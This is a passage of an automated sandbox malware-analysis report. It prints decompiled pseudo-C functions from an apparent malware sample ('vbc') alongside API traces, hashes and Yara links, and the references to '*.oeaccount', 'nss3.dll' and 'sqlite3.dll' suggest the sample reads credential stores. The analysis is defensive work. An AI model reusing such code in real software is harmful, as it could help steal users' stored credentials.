				_t23 =  *(__ecx + 0x10);
				_t36 = _t23 + __eax * 8;
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
				_t25 = _t23 >> 0x00000003 & 0x0000003f;
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040BF6B(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;
					_t40 = _t48 + 0x18 + _t25;
					if(_t34 >= _t47) {
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040BF6B(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();
			}













                                                                                                                                                                        0x0040be53
                                                                                                                                                                        0x0040be55
                                                                                                                                                                        0x0040be57
                                                                                                                                                                        0x0040be5a
                                                                                                                                                                        0x0040be60
                                                                                                                                                                        0x0040be63
                                                                                                                                                                        0x0040be65
                                                                                                                                                                        0x0040be65
                                                                                                                                                                        0x0040be6d
                                                                                                                                                                        0x0040be73
                                                                                                                                                                        0x0040be76
                                                                                                                                                                        0x0040bea8
                                                                                                                                                                        0x0040beab
                                                                                                                                                                        0x0040beaf
                                                                                                                                                                        0x0040beb2
                                                                                                                                                                        0x0040bebb
                                                                                                                                                                        0x0040bec0
                                                                                                                                                                        0x0040bec8
                                                                                                                                                                        0x0040becd
                                                                                                                                                                        0x0040bed1
                                                                                                                                                                        0x0040bed4
                                                                                                                                                                        0x0040bed4
                                                                                                                                                                        0x0040beb2
                                                                                                                                                                        0x0040bed7
                                                                                                                                                                        0x0040bed8
                                                                                                                                                                        0x0040bede
                                                                                                                                                                        0x0040be78
                                                                                                                                                                        0x0040be7a
                                                                                                                                                                        0x0040be7b
                                                                                                                                                                        0x0040be7f
                                                                                                                                                                        0x0040be83
                                                                                                                                                                        0x0040be91
                                                                                                                                                                        0x0040be96
                                                                                                                                                                        0x0040be9e
                                                                                                                                                                        0x0040bea3
                                                                                                                                                                        0x0040bea6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040be85
                                                                                                                                                                        0x0040be85
                                                                                                                                                                        0x0040be86
                                                                                                                                                                        0x0040be89
                                                                                                                                                                        0x0040be89
                                                                                                                                                                        0x0040be83
                                                                                                                                                                        0x0040beeb

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID: @
                                                                                                                                                                        • API String ID: 3510742995-2766056989
                                                                                                                                                                        • Opcode ID: 49a5a345e8207f48ba7b20f9c3d546e09529423d2927eee968959314de42fdf5
                                                                                                                                                                        • Instruction ID: eb902c52722b89a171555a0eccdb346c2cc9b7794a0320b873d5afd3574b0f46
                                                                                                                                                                        • Opcode Fuzzy Hash: 49a5a345e8207f48ba7b20f9c3d546e09529423d2927eee968959314de42fdf5
                                                                                                                                                                        • Instruction Fuzzy Hash: 201138B29007096BCB288E25C8809EB77A9EF54344700063FFE0696691E7759E95C7DC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B84C Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040B84C(void* __ecx, void* _a4) {
				struct _WNDCLASSA _v44;
				void _v299;
				char _v300;
				void _v555;
				char _v556;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t27;
				CHAR* _t32;
				struct HWND__* _t34;
				void* _t36;
				void* _t41;

				_t36 = __ecx;
				_v556 = 0;
				memset( &_v555, 0, 0xff);
				_v300 = 0;
				memset( &_v299, 0, 0xff);
				_t27 =  *0x417b94; // 0x400000
				_t41 = _a4;
				_v44.hInstance = _t27;
				_v44.hIcon =  *((intOrPtr*)(_t41 + 0x104));
				_v44.lpszClassName = _t41 + 4;
				_v44.style = 0;
				_v44.lpfnWndProc = E0040174E;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassA( &_v44);
				_t32 = E004019DA(_t36,  &_v300, 0x413450);
				_t34 = CreateWindowExA(0, E004019DA(_t36,  &_v556, 0x414478), _t32, 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x417b94, _t41);
				 *(_a4 + 0x108) = _t34;
				return _t34;
			}















                                                                                                                                                                        0x0040b84c
                                                                                                                                                                        0x0040b868
                                                                                                                                                                        0x0040b86e
                                                                                                                                                                        0x0040b87c
                                                                                                                                                                        0x0040b882
                                                                                                                                                                        0x0040b887
                                                                                                                                                                        0x0040b88c
                                                                                                                                                                        0x0040b88f
                                                                                                                                                                        0x0040b898
                                                                                                                                                                        0x0040b89e
                                                                                                                                                                        0x0040b8a8
                                                                                                                                                                        0x0040b8ab
                                                                                                                                                                        0x0040b8b2
                                                                                                                                                                        0x0040b8b5
                                                                                                                                                                        0x0040b8b8
                                                                                                                                                                        0x0040b8bb
                                                                                                                                                                        0x0040b8c2
                                                                                                                                                                        0x0040b8c5
                                                                                                                                                                        0x0040b8f0
                                                                                                                                                                        0x0040b908
                                                                                                                                                                        0x0040b913
                                                                                                                                                                        0x0040b91b

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ClassCreateRegisterWindowstrncat
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3664037073-0
                                                                                                                                                                        • Opcode ID: be5346cb48c8cedca28fb9c953b908c4a3ca165af802d2e293ff076a17b9cc61
                                                                                                                                                                        • Instruction ID: a433a9f07fbe34a5cd63bc5fe357f5218a2175739f92369553503b68093de8d1
                                                                                                                                                                        • Opcode Fuzzy Hash: be5346cb48c8cedca28fb9c953b908c4a3ca165af802d2e293ff076a17b9cc61
                                                                                                                                                                        • Instruction Fuzzy Hash: F1211FB5C01218AFDB50DF95DD85ADFBBBCEB08354F0040BAE549B3251C778AE848BA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004070D9 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E004070D9(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L00412090();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L00412096();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                                                                        0x004070d9
                                                                                                                                                                        0x004070da
                                                                                                                                                                        0x004070da
                                                                                                                                                                        0x004070dd
                                                                                                                                                                        0x004070e1
                                                                                                                                                                        0x004070f4
                                                                                                                                                                        0x004070f4
                                                                                                                                                                        0x004070f8
                                                                                                                                                                        0x004070fa
                                                                                                                                                                        0x00407100
                                                                                                                                                                        0x00407101
                                                                                                                                                                        0x00407104
                                                                                                                                                                        0x0040710d
                                                                                                                                                                        0x0040710e
                                                                                                                                                                        0x00407113
                                                                                                                                                                        0x0040711d
                                                                                                                                                                        0x0040711f
                                                                                                                                                                        0x00407124
                                                                                                                                                                        0x0040712b
                                                                                                                                                                        0x00407135
                                                                                                                                                                        0x00407137
                                                                                                                                                                        0x00407138
                                                                                                                                                                        0x0040713d
                                                                                                                                                                        0x00407144
                                                                                                                                                                        0x0040714d
                                                                                                                                                                        0x004070e3
                                                                                                                                                                        0x004070e3
                                                                                                                                                                        0x004070e5
                                                                                                                                                                        0x004070e7
                                                                                                                                                                        0x004070ec
                                                                                                                                                                        0x004070ed
                                                                                                                                                                        0x004070f0
                                                                                                                                                                        0x004070f2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004070f2
                                                                                                                                                                        0x0040715d
                                                                                                                                                                        0x00407160
                                                                                                                                                                        0x00407169
                                                                                                                                                                        0x00407169
                                                                                                                                                                        0x00407152
                                                                                                                                                                        0x00407156

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1865533344-0
                                                                                                                                                                        • Opcode ID: e4c1b742036f6387abe750b9dffb2ef64d195688e0a077fc4da9177e63e0e53c
                                                                                                                                                                        • Instruction ID: 17b98b22fb48c4f462205fa6a58e9a56533f9d3233289d57114c66ebe089a08a
                                                                                                                                                                        • Opcode Fuzzy Hash: e4c1b742036f6387abe750b9dffb2ef64d195688e0a077fc4da9177e63e0e53c
                                                                                                                                                                        • Instruction Fuzzy Hash: A6113D716046019FD328DF2DC981A27F7E6FF98304B20892EE59AC7385DA75E841CB55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F61F Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                        			E0040F61F(char* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v304;
				char* _t18;
				char* _t22;
				char* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040F5A7;
					_v16 = __esi;
					__imp__SHBrowseForFolderA(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v304;
						__imp__SHGetPathFromIDListA(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							strcpy(__esi,  &_v304);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                                                                        0x0040f629
                                                                                                                                                                        0x0040f62d
                                                                                                                                                                        0x0040f62f
                                                                                                                                                                        0x0040f637
                                                                                                                                                                        0x0040f63c
                                                                                                                                                                        0x0040f642
                                                                                                                                                                        0x0040f646
                                                                                                                                                                        0x0040f64a
                                                                                                                                                                        0x0040f64d
                                                                                                                                                                        0x0040f650
                                                                                                                                                                        0x0040f657
                                                                                                                                                                        0x0040f65e
                                                                                                                                                                        0x0040f661
                                                                                                                                                                        0x0040f667
                                                                                                                                                                        0x0040f66b
                                                                                                                                                                        0x0040f66d
                                                                                                                                                                        0x0040f675
                                                                                                                                                                        0x0040f67d
                                                                                                                                                                        0x0040f687
                                                                                                                                                                        0x0040f688
                                                                                                                                                                        0x0040f68e
                                                                                                                                                                        0x0040f68f
                                                                                                                                                                        0x0040f696
                                                                                                                                                                        0x0040f699
                                                                                                                                                                        0x0040f69f
                                                                                                                                                                        0x0040f69f
                                                                                                                                                                        0x0040f6a2
                                                                                                                                                                        0x0040f6a7

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetMalloc.SHELL32(?), ref: 0040F62F
                                                                                                                                                                        • SHBrowseForFolderA.SHELL32(?), ref: 0040F661
                                                                                                                                                                        • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F675
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 0040F688
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BrowseFolderFromListMallocPathstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 409945605-0
                                                                                                                                                                        • Opcode ID: 46f915da22a8394e3ccfb75a6a67a5d073b6093023bbcacd313ffdd2da9d0fc7
                                                                                                                                                                        • Instruction ID: b2d480601b656eadb7f9024a04999e6b50b11c93cc119ce3783244db306e4add
                                                                                                                                                                        • Opcode Fuzzy Hash: 46f915da22a8394e3ccfb75a6a67a5d073b6093023bbcacd313ffdd2da9d0fc7
                                                                                                                                                                        • Instruction Fuzzy Hash: 5811F7B5900208AFCB10DFA9D9889EEBBF8FB49315F10447AE905E7250D739DA46CF64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00411C05 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E00411C05(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				void* _t10;
				void* _t13;
				char* _t15;
				void* _t21;
				void* _t24;
				long _t27;

				_t10 = E00405ED5(_a8);
				_pop(_t21);
				_a8 = _t10;
				if(_t10 == 0xffffffff) {
					return 0;
				}
				_t27 = GetFileSize(_t10, 0);
				_t3 = _t27 + 5; // 0x5
				_t13 = _t3;
				_push(_t13);
				L00412090();
				_t24 = _t13;
				E00406725(_t21, _a8, _t24, _t27);
				_t15 = _t24 + _t27;
				 *_t15 = 0;
				 *((char*)(_t15 + 1)) = 0;
				 *((char*)(_t15 + 2)) = 0;
				E00411C76(_a4, _t24);
				CloseHandle(_a8);
				if(_t24 != 0) {
					_push(_t24);
					L00412096();
				}
				return 1;
			}









                                                                                                                                                                        0x00411c0b
                                                                                                                                                                        0x00411c13
                                                                                                                                                                        0x00411c14
                                                                                                                                                                        0x00411c17
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00411c70
                                                                                                                                                                        0x00411c24
                                                                                                                                                                        0x00411c26
                                                                                                                                                                        0x00411c26
                                                                                                                                                                        0x00411c29
                                                                                                                                                                        0x00411c2a
                                                                                                                                                                        0x00411c2f
                                                                                                                                                                        0x00411c36
                                                                                                                                                                        0x00411c3b
                                                                                                                                                                        0x00411c41
                                                                                                                                                                        0x00411c44
                                                                                                                                                                        0x00411c48
                                                                                                                                                                        0x00411c50
                                                                                                                                                                        0x00411c58
                                                                                                                                                                        0x00411c60
                                                                                                                                                                        0x00411c62
                                                                                                                                                                        0x00411c63
                                                                                                                                                                        0x00411c68
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D064,00000000,0040D972,?,?,00000104,00000000,?,0040D972,?,00000000), ref: 00411C1E
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00411C2A
                                                                                                                                                                          • Part of subcall function 00406725: ReadFile.KERNEL32(?,0041141B,?,00000000,00000000,?,?,004112BE,0041141B,00000000,-00000002,?,0041133F,?,?,*.oeaccount), ref: 0040673C
                                                                                                                                                                        • CloseHandle.KERNEL32(0040D972,00000000,?,0040D972,?,00000000,?,?,?,?,?,?), ref: 00411C58
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00411C63
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1968906679-0
                                                                                                                                                                        • Opcode ID: 33877706b5d6ce5a60bd243af652b3227341b80957e1355f9b7c322417ce527a
                                                                                                                                                                        • Instruction ID: 7eee50cd159b1862f9f77aaf36d5f43b0d65e01e2e9cd2c6863135ac6fea6ec1
                                                                                                                                                                        • Opcode Fuzzy Hash: 33877706b5d6ce5a60bd243af652b3227341b80957e1355f9b7c322417ce527a
                                                                                                                                                                        • Instruction Fuzzy Hash: 7801A231004104AAD711AF35DC09FDB3FA99F46374F15C12AF5188B2A1EB7A8650C7A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A5A1 Relevance: 6.0, APIs: 4, Instructions: 45stringwindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E0040A5A1(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				char* _t16;
				signed short _t25;
				signed short _t27;
				void* _t28;

				_t28 = __esi;
				_push(E004087B1( *((intOrPtr*)(__esi + 0x370))));
				_t25 = 4;
				sprintf( &_v260, E00407A69(_t25));
				_t16 = E00408D4B( *((intOrPtr*)(__esi + 0x370)), 0);
				if(_t16 > 0) {
					_push(_t16);
					_t27 = 5;
					sprintf( &_v516, E00407A69(_t27));
					_t16 = strcat( &_v260,  &_v516);
				}
				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}










                                                                                                                                                                        0x0040a5a1
                                                                                                                                                                        0x0040a5b6
                                                                                                                                                                        0x0040a5b9
                                                                                                                                                                        0x0040a5c7
                                                                                                                                                                        0x0040a5d7
                                                                                                                                                                        0x0040a5de
                                                                                                                                                                        0x0040a5e0
                                                                                                                                                                        0x0040a5e3
                                                                                                                                                                        0x0040a5f1
                                                                                                                                                                        0x0040a604
                                                                                                                                                                        0x0040a609
                                                                                                                                                                        0x0040a614
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a62a
                                                                                                                                                                        0x0040a631

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00407A69: LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                          • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040A5C7
                                                                                                                                                                        • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A62A
                                                                                                                                                                          • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,73B74DE0), ref: 00407AE4
                                                                                                                                                                          • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040A5F1
                                                                                                                                                                        • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A604
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 919693953-0
                                                                                                                                                                        • Opcode ID: 958ab865ac69a3c4c3d9128656c309624dbea8e97793038db77fe03c7bb4008b
                                                                                                                                                                        • Instruction ID: 49acf1ec04927684f0e14b468f671fa247d4e43980f6f5764d7eadf86f6a0ac4
                                                                                                                                                                        • Opcode Fuzzy Hash: 958ab865ac69a3c4c3d9128656c309624dbea8e97793038db77fe03c7bb4008b
                                                                                                                                                                        • Instruction Fuzzy Hash: 8A01DBB190030467D720F7B4CD86FDB73ACAB04304F04046FB755F61C2DAB9E6948A69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040FA2B Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                        			E0040FA2B(char* _a4) {
				void _v267;
				char _v268;
				int _t12;
				signed int _t16;

				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t12 = strlen(_a4);
				_t5 = strlen("sqlite3.dll") + 1; // 0x1
				if(_t12 + _t5 >= 0x104) {
					_v268 = 0;
				} else {
					E004062B7( &_v268, _a4, "sqlite3.dll");
				}
				_t16 = E00406155( &_v268);
				asm("sbb eax, eax");
				return  ~( ~_t16);
			}







                                                                                                                                                                        0x0040fa46
                                                                                                                                                                        0x0040fa4d
                                                                                                                                                                        0x0040fa55
                                                                                                                                                                        0x0040fa67
                                                                                                                                                                        0x0040fa70
                                                                                                                                                                        0x0040fa85
                                                                                                                                                                        0x0040fa72
                                                                                                                                                                        0x0040fa7c
                                                                                                                                                                        0x0040fa82
                                                                                                                                                                        0x0040fa93
                                                                                                                                                                        0x0040fa9c
                                                                                                                                                                        0x0040faa3

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040FA4D
                                                                                                                                                                        • strlen.MSVCRT ref: 0040FA55
                                                                                                                                                                        • strlen.MSVCRT ref: 0040FA62
                                                                                                                                                                          • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                                                                                                                                                                          • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strlen$memsetstrcatstrcpy
                                                                                                                                                                        • String ID: sqlite3.dll
                                                                                                                                                                        • API String ID: 1581230619-1155512374
                                                                                                                                                                        • Opcode ID: 16108ddf4f13ffc1d1035336796fcbbad104ce4c6981e8ccb6bc320039be4e03
                                                                                                                                                                        • Instruction ID: 4f80a8773c1d4988f6668b9143c1107d12609c3bb00905d80200812c675c4c4f
                                                                                                                                                                        • Opcode Fuzzy Hash: 16108ddf4f13ffc1d1035336796fcbbad104ce4c6981e8ccb6bc320039be4e03
                                                                                                                                                                        • Instruction Fuzzy Hash: F6F0427250C1186EDB20E769DC45FC977AC8F60318F1000B7F589E60C2DAF8D6C58668
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00409A67 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00409A67(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E0040918B(_t26, _t15);
				sprintf( &_v516, "</%s>\r\n", _t26);
				return E00405F07(_a4,  &_v516);
			}











                                                                                                                                                                        0x00409a81
                                                                                                                                                                        0x00409a83
                                                                                                                                                                        0x00409a8a
                                                                                                                                                                        0x00409a99
                                                                                                                                                                        0x00409aa0
                                                                                                                                                                        0x00409aac
                                                                                                                                                                        0x00409ab0
                                                                                                                                                                        0x00409ab6
                                                                                                                                                                        0x00409aca
                                                                                                                                                                        0x00409ae4

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00409A8A
                                                                                                                                                                        • memset.MSVCRT ref: 00409AA0
                                                                                                                                                                          • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                                                                                                                                                                          • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                                                                                                                                                                        • sprintf.MSVCRT ref: 00409ACA
                                                                                                                                                                          • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                          • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,73B74DE0,00000000,?,?,00409460,00000001,00413B1C,73B74DE0), ref: 00405F21
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                                                                                                        • String ID: </%s>
                                                                                                                                                                        • API String ID: 3202206310-259020660
                                                                                                                                                                        • Opcode ID: 637a9c7a3fbe891b17e74324215966cd4ae9ffaeb73701361f90968b62e1fe90
                                                                                                                                                                        • Instruction ID: 3d0bab8d804eeed29aac85efced1b4409724b73b0f4afa6070eee5aab36d753a
                                                                                                                                                                        • Opcode Fuzzy Hash: 637a9c7a3fbe891b17e74324215966cd4ae9ffaeb73701361f90968b62e1fe90
